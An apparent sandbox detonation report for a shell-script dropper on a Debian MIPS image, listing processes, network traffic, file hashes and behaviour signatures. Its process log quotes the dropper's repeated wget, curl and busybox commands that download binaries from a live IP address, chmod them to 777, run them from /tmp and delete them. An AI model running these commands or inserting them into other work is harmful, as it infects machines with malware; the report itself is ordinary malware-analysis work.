/bin/rm

[rm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/wget

[wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/chmod

[chmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL

[./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/rm

[rm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/chmod

[chmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0

[./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/rm

[rm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/wget

[wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/chmod

[chmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD

[./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/rm

[rm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/wget

[wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/chmod

[chmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA

[./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/rm

[rm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 01:49

Reported

2024-10-18 01:52

Platform

debian9-mipsel-20240611-en

Max time kernel

93s

Max time network

92s

Command Line

[/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq N/A
N/A /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 N/A
N/A /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K N/A
N/A /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg N/A
N/A /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 N/A
N/A /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z N/A
N/A /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq N/A
N/A /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 N/A
N/A /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV N/A
N/A /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL N/A
N/A /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 N/A
N/A /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD N/A
N/A /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA N/A
N/A /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW N/A
N/A /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq N/A
N/A /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z N/A
N/A /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 N/A
N/A /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K N/A
N/A /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg N/A
N/A /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 N/A
N/A /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV N/A
N/A /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq N/A
N/A /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 N/A
N/A /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW N/A
N/A /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL N/A
N/A /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 N/A
N/A /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD N/A
N/A /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /usr/bin/curl N/A
File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /usr/bin/curl N/A
File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /usr/bin/curl N/A
File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /usr/bin/curl N/A
File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /usr/bin/curl N/A
File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /usr/bin/curl N/A
File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /usr/bin/curl N/A
File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /usr/bin/curl N/A
File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /usr/bin/curl N/A
File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /usr/bin/curl N/A
File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /usr/bin/curl N/A
File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /usr/bin/curl N/A
File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /usr/bin/curl N/A
File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /usr/bin/curl N/A
File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /usr/bin/curl N/A
File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /usr/bin/curl N/A
File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /usr/bin/curl N/A
File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /usr/bin/curl N/A
File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /usr/bin/curl N/A
File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /usr/bin/curl N/A
File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /usr/bin/curl N/A
File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /usr/bin/curl N/A
File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /usr/bin/curl N/A
File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /usr/bin/curl N/A
File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /usr/bin/curl N/A
File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /usr/bin/curl N/A
File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /usr/bin/curl N/A
File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /usr/bin/curl N/A

Processes

/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh

[/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/chmod

[chmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

[./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/rm

[rm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/wget

[wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/chmod

[chmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5

[./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/bin/rm

[rm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5]

/usr/bin/wget

[wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/chmod

[chmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K

[./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/bin/rm

[rm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K]

/usr/bin/wget

[wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/chmod

[chmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg

[./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/bin/rm

[rm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg]

/usr/bin/wget

[wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/chmod

[chmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9

[./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/bin/rm

[rm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9]

/usr/bin/wget

[wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/chmod

[chmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z

[./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/bin/rm

[rm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z]

/usr/bin/wget

[wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/chmod

[chmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq

[./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/bin/rm

[rm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq]

/usr/bin/wget

[wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/chmod

[chmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4

[./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/bin/rm

[rm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4]

/usr/bin/wget

[wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/chmod

[chmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV

[./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/bin/rm

[rm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV]

/usr/bin/wget

[wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/chmod

[chmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL

[./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/bin/rm

[rm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/chmod

[chmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0

[./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/bin/rm

[rm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0]

/usr/bin/wget

[wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/chmod

[chmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD

[./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/bin/rm

[rm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD]

/usr/bin/wget

[wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/chmod

[chmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA

[./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/bin/rm

[rm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA]

/usr/bin/wget

[wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/chmod

[chmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW

[./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/bin/rm

[rm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW]

/usr/bin/wget

[wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/chmod

[chmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq

[./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

/bin/rm

[rm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq]

